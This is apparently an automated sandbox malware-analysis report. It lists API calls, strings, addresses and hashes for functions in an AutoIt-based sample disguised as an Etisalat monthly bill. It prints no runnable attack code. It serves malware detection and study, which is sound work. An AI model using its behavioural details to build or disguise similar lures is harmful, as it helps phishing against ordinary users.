Fixed, xrefs: 00914C09
FileBackedVirtual, xrefs: 00914CEC
1394, xrefs: 00914C9F
SSA, xrefs: 00914CA6
RAID, xrefs: 00914CBB
\\.\, xrefs: 00914B3F
MMC, xrefs: 00914CDE
Removable, xrefs: 00914C10, 00914C15
iSCSI, xrefs: 00914CC2
ATA, xrefs: 00914C98
USB, xrefs: 00914CB4
SSD, xrefs: 00914C4A
CDROM, xrefs: 00914BFB
Unknown, xrefs: 00914BED, 00914C83

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 1d20c32aab114fa617289222f239377ba4887f0abbb078c7a23d90df42e94d5f
Instruction ID: e44a8875f1790d76435c4b2e7c1fe7073ccaa849c9d01b8ae49490370c076de8
Opcode Fuzzy Hash: 1d20c32aab114fa617289222f239377ba4887f0abbb078c7a23d90df42e94d5f
Instruction Fuzzy Hash: CF61D53070510DDBDB04DF28CA91DEC77A4EB8E744B244415F846AB691DB39ED81DB82

Function 009373E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00937421
SetTextColor.GDI32(?,?), ref: 00937425
GetSysColorBrush.USER32(0000000F), ref: 0093743B
GetSysColor.USER32(0000000F), ref: 00937446
CreateSolidBrush.GDI32(?), ref: 0093744B
GetSysColor.USER32(00000011), ref: 00937463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00937471
SelectObject.GDI32(?,00000000), ref: 00937482
SetBkColor.GDI32(?,00000000), ref: 0093748B
SelectObject.GDI32(?,?), ref: 00937498
InflateRect.USER32(?,000000FF,000000FF), ref: 009374B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009374CE
GetWindowLongW.USER32(00000000,000000F0), ref: 009374DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0093752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00937554
InflateRect.USER32(?,000000FD,000000FD), ref: 00937572
DrawFocusRect.USER32(?,?), ref: 0093757D
GetSysColor.USER32(00000011), ref: 0093758E
SetTextColor.GDI32(?,00000000), ref: 00937596
DrawTextW.USER32(?,009370F5,000000FF,?,00000000), ref: 009375A8
SelectObject.GDI32(?,?), ref: 009375BF
DeleteObject.GDI32(?), ref: 009375CA
SelectObject.GDI32(?,?), ref: 009375D0
DeleteObject.GDI32(?), ref: 009375D5
SetTextColor.GDI32(?,?), ref: 009375DB
SetBkColor.GDI32(?,?), ref: 009375E5

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 5fbb996e46e031a53d8cfb4f51a7880df6ed3458178729acdce025362f6fdf24
Instruction ID: e30b89be0ff08f7129d8fd2da042c385939550bbd85d7b35de08bf4ee09b3bf4
Opcode Fuzzy Hash: 5fbb996e46e031a53d8cfb4f51a7880df6ed3458178729acdce025362f6fdf24
Instruction Fuzzy Hash: E66171B2908618AFDF119FA4DC49EEEBFB9EB08320F104115F911BB2A1D7759940EF90

Function 00930FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00931128
GetDesktopWindow.USER32 ref: 0093113D
GetWindowRect.USER32(00000000), ref: 00931144
GetWindowLongW.USER32(?,000000F0), ref: 00931199
DestroyWindow.USER32(?), ref: 009311B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 009311ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0093120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0093121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 00931232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00931245
IsWindowVisible.USER32(00000000), ref: 009312A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 009312BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 009312D0
GetWindowRect.USER32(00000000,?), ref: 009312E8
MonitorFromPoint.USER32(?,?,00000002), ref: 0093130E
GetMonitorInfoW.USER32(00000000,?), ref: 00931328
CopyRect.USER32(?,?), ref: 0093133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 009313AA

Strings

0, xrefs: 009310D3
tooltips_class32, xrefs: 009311E6
(, xrefs: 0093131B

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 5aea8d454089be8a725d55cd945d1357f211071abeb2d063885a4009ea62de0b
Instruction ID: 00a4642bc7e5f54610e47bc82f8e75252fc7fff7e57037cbe56931e3322e68ff
Opcode Fuzzy Hash: 5aea8d454089be8a725d55cd945d1357f211071abeb2d063885a4009ea62de0b
Instruction Fuzzy Hash: FFB18C71608341AFD704DF68C885B6BBBE5FF85354F008918F999AB2A1CB71E845CF92

Function 00930241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 009302E5
_wcslen.LIBCMT ref: 0093031F
_wcslen.LIBCMT ref: 00930389
_wcslen.LIBCMT ref: 009303F1
_wcslen.LIBCMT ref: 00930475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 009304C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00930504

Part of subcall function 008BF9F2: _wcslen.LIBCMT ref: 008BF9FD

Part of subcall function 0090223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00902258
Part of subcall function 0090223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0090228A

Strings

SELECTINVERT, xrefs: 0093057E
GETSUBITEMCOUNT, xrefs: 00930384, 0093039F
ISSELECTED, xrefs: 009304DD
SELECTCLEAR, xrefs: 0093052D
DESELECT, xrefs: 0093059C
SELECT, xrefs: 00930548
GETSELECTED, xrefs: 009305E1
GETSELECTEDCOUNT, xrefs: 00930470, 0093048B
GETTEXT, xrefs: 009303EC, 00930407
VIEWCHANGE, xrefs: 00930675
FINDITEM, xrefs: 00930627
SELECTALL, xrefs: 00930515
GETITEMCOUNT, xrefs: 00930316, 00930337

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 51595c77ca3ef31562d101273d505990fa2151f3aea630ca35f05a21c65bad83
Instruction ID: ca638bf3ac7c645996fc437d87b654ee223b443b21b3e980145a5de4f3e9eb4d
Opcode Fuzzy Hash: 51595c77ca3ef31562d101273d505990fa2151f3aea630ca35f05a21c65bad83
Instruction Fuzzy Hash: 9CE18C312182018FC714DF28C96196AB7E6FFC8718F144A6CF8969B7A6DB34ED45CB42

Function 008B8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008B8968
GetSystemMetrics.USER32(00000007), ref: 008B8970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008B899B
GetSystemMetrics.USER32(00000008), ref: 008B89A3
GetSystemMetrics.USER32(00000004), ref: 008B89C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 008B89E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 008B89F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 008B8A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 008B8A3C
GetClientRect.USER32(00000000,000000FF), ref: 008B8A5A
GetStockObject.GDI32(00000011), ref: 008B8A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 008B8A81

Part of subcall function 008B912D: GetCursorPos.USER32(?), ref: 008B9141
Part of subcall function 008B912D: ScreenToClient.USER32(00000000,?), ref: 008B915E
Part of subcall function 008B912D: GetAsyncKeyState.USER32(00000001), ref: 008B9183
Part of subcall function 008B912D: GetAsyncKeyState.USER32(00000002), ref: 008B919D

SetTimer.USER32(00000000,00000000,00000028,008B90FC), ref: 008B8AA8

Strings

AutoIt v3 GUI, xrefs: 008B8A20

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 4aef177c1082d3fa676b391def2a98fc830f12102164d6c2d5e8f4445a0fe5e1
Instruction ID: 0f888ec58b1b045ff7d71372c6d336a418081b593a390ff731d6770c960b82c9
Opcode Fuzzy Hash: 4aef177c1082d3fa676b391def2a98fc830f12102164d6c2d5e8f4445a0fe5e1
Instruction Fuzzy Hash: 5FB16776A1420AEFDB14DFA8DC85BEA3BB5FB48314F104229FA15E7290DB30A841DF51

Function 00900D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00901114
Part of subcall function 009010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00900B9B,?,?,?), ref: 00901120
Part of subcall function 009010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00900B9B,?,?,?), ref: 0090112F
Part of subcall function 009010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00900B9B,?,?,?), ref: 00901136
Part of subcall function 009010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0090114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00900DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00900E29
GetLengthSid.ADVAPI32(?), ref: 00900E40
GetAce.ADVAPI32(?,00000000,?), ref: 00900E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00900E96
GetLengthSid.ADVAPI32(?), ref: 00900EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00900EB5
HeapAlloc.KERNEL32(00000000), ref: 00900EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00900EDD
CopySid.ADVAPI32(00000000), ref: 00900EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00900F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00900F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00900F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00900F6E
HeapFree.KERNEL32(00000000), ref: 00900F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00900F7E
HeapFree.KERNEL32(00000000), ref: 00900F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00900F8E
HeapFree.KERNEL32(00000000), ref: 00900F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00900FA1
HeapFree.KERNEL32(00000000), ref: 00900FA8

Part of subcall function 00901193: GetProcessHeap.KERNEL32(00000008,00900BB1,?,00000000,?,00900BB1,?), ref: 009011A1
Part of subcall function 00901193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00900BB1,?), ref: 009011A8
Part of subcall function 00901193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00900BB1,?), ref: 009011B7

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: c7c863218c1a074f995901dedfc3a5dbd6c5c39da408e3b6fda8dc116e40e049
Instruction ID: 3dd376c00256fdd3b2acc2fe3af4fbce4d35e4b62b662d6601ecb9a4f86afd99
Opcode Fuzzy Hash: c7c863218c1a074f995901dedfc3a5dbd6c5c39da408e3b6fda8dc116e40e049
Instruction Fuzzy Hash: 9B7159B290820AAFDF209FA4DC48BAEBBBCBF45301F044115FA59F6191D7319A05EF60

Function 0092C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0092C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,0093CC08,00000000,?,00000000,?,?), ref: 0092C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0092C5A4
_wcslen.LIBCMT ref: 0092C5F4
_wcslen.LIBCMT ref: 0092C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0092C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0092C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0092C84D
RegCloseKey.ADVAPI32(?), ref: 0092C881
RegCloseKey.ADVAPI32(00000000), ref: 0092C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0092C960

Strings

REG_EXPAND_SZ, xrefs: 0092C5CD
REG_DWORD, xrefs: 0092C804
REG_QWORD, xrefs: 0092C8C3
REG_BINARY, xrefs: 0092C913
REG_MULTI_SZ, xrefs: 0092C6F5
REG_SZ, xrefs: 0092C644

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 64f71554035b8b2da2150792a05f8adc040c35090e2c031d4d9dd97a4cac5be6
Instruction ID: df3fb83cb430834bed678d40121ef85580dd908cc2319260b4342a3cd2e944f8
Opcode Fuzzy Hash: 64f71554035b8b2da2150792a05f8adc040c35090e2c031d4d9dd97a4cac5be6
Instruction Fuzzy Hash: 21125A756082119FDB14DF18D891E2AB7E5FF89714F04885CF88A9B7A2DB31ED41CB82

Function 0093091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 009309C6
_wcslen.LIBCMT ref: 00930A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00930A54
_wcslen.LIBCMT ref: 00930A8A
_wcslen.LIBCMT ref: 00930B06
_wcslen.LIBCMT ref: 00930B81

Part of subcall function 008BF9F2: _wcslen.LIBCMT ref: 008BF9FD

Part of subcall function 00902BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00902BFA

Strings

CHECK, xrefs: 00930A85, 00930AA0
UNCHECK, xrefs: 00930D3E
EXPAND, xrefs: 00930BF8
GETTOTALCOUNT, xrefs: 009309F2, 00930A17
EXISTS, xrefs: 00930B7C, 00930B97
COLLAPSE, xrefs: 00930B01, 00930B1C
SELECT, xrefs: 00930D11
GETSELECTED, xrefs: 00930C4E
ISCHECKED, xrefs: 00930CE1
GETITEMCOUNT, xrefs: 00930C1E
GETTEXT, xrefs: 00930C97

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: bf5403bc6e4dc617dd66289b45916612c78e1695d51adac6467e1c54ec1f1f19
Instruction ID: cdd4cfbd8470661339009c41c90b49b083df41faeece7a19314fec31a01c698c
Opcode Fuzzy Hash: bf5403bc6e4dc617dd66289b45916612c78e1695d51adac6467e1c54ec1f1f19
Instruction Fuzzy Hash: 9AE156356083018FCB14EF28C46092AB7E5FFD9718F14895DE8969B7A2DB31ED45CB82

Function 0092C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0092B6AE,?,?), ref: 0092C9B5
_wcslen.LIBCMT ref: 0092C9F1
_wcslen.LIBCMT ref: 0092CA68
_wcslen.LIBCMT ref: 0092CA9E
_wcslen.LIBCMT ref: 0092CAF9
_wcslen.LIBCMT ref: 0092CB2F
_wcslen.LIBCMT ref: 0092CB7F

Strings

HKLM, xrefs: 0092CA98, 0092CA9D
HKCR, xrefs: 0092CB29, 0092CB2E
HKEY_LOCAL_MACHINE, xrefs: 0092CA62, 0092CA67
HKEY_CURRENT_USER, xrefs: 0092CBBD
HKCC, xrefs: 0092CBAC
HKU, xrefs: 0092CBF0
HKEY_CLASSES_ROOT, xrefs: 0092CAF3, 0092CAF8
HKEY_CURRENT_CONFIG, xrefs: 0092CB79, 0092CB7E
HKEY_USERS, xrefs: 0092CBDF
HKCU, xrefs: 0092CBCE

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: e855e8de539ac078f75dace65136ed003477ac088b4ba5c0fb99b636a83bffe0
Instruction ID: 33f4ab134833aeb4126e849adebd86e8cafdee813f225e605db751aef8d93823
Opcode Fuzzy Hash: e855e8de539ac078f75dace65136ed003477ac088b4ba5c0fb99b636a83bffe0
Instruction Fuzzy Hash: 797115B260053A8BCB20DE7CED516BF33A9AF61754F250528F856E728CE635DD84C3A1

Function 0093833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0093835A
_wcslen.LIBCMT ref: 0093836E
_wcslen.LIBCMT ref: 00938391
_wcslen.LIBCMT ref: 009383B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 009383F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00935BF2), ref: 0093844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00938487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 009384CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00938501
FreeLibrary.KERNEL32(?), ref: 0093850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0093851D
DestroyIcon.USER32(?,?,?,?,?,00935BF2), ref: 0093852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00938549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00938555

Strings

.dll, xrefs: 009383AB
.exe, xrefs: 00938388
.icl, xrefs: 00938368

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 344df7fe338b6db3f151e1b8f8653754ff42703140c1eccdb4faba411472ca6c
Instruction ID: 8da9505db9c64579282d4501731cbd192979de08074d1215a6aae374a6463f48
Opcode Fuzzy Hash: 344df7fe338b6db3f151e1b8f8653754ff42703140c1eccdb4faba411472ca6c
Instruction Fuzzy Hash: 9E61CDB2904715BAEB149F64CC85BBF77ACFB08B11F104609F815E61E1DB74A984DBA0

Function 008A7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#comments-end, xrefs: 008A78D9
#ce, xrefs: 008A78ED
#notrayicon, xrefs: 008A77E7
Cannot parse #include, xrefs: 008E5279
', xrefs: 008E5169
#OnAutoItStartRegister, xrefs: 008A7817
#pragma compile, xrefs: 008A77D3
#cs, xrefs: 008A7873, 008A78C5
", xrefs: 008E5153
Bad directive syntax error, xrefs: 008E519A
#include, xrefs: 008A7847
#requireadmin, xrefs: 008A77FF
Unterminated group of comments, xrefs: 008E528C
#comments-start, xrefs: 008A785F, 008A78B1
#include-once, xrefs: 008A782F

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: e3a9f050ff4dca98a9b7937f32b696a88de4ba8da8bfc07f9b35abc6818d681c
Instruction ID: 3581d10c6bcf3b941eec1746a4139494a53610c4fdc2c9be4b771771ec94685f
Opcode Fuzzy Hash: e3a9f050ff4dca98a9b7937f32b696a88de4ba8da8bfc07f9b35abc6818d681c
Instruction Fuzzy Hash: 2481F671A44605BBEB20AF65DC42FAF37B8FF56304F044024F905EA592EB70DA11E7A2

Function 00905A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00905A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00905A40
SetWindowTextW.USER32(?,?), ref: 00905A57
GetDlgItem.USER32(?,000003EA), ref: 00905A6C
SetWindowTextW.USER32(00000000,?), ref: 00905A72
GetDlgItem.USER32(?,000003E9), ref: 00905A82
SetWindowTextW.USER32(00000000,?), ref: 00905A88
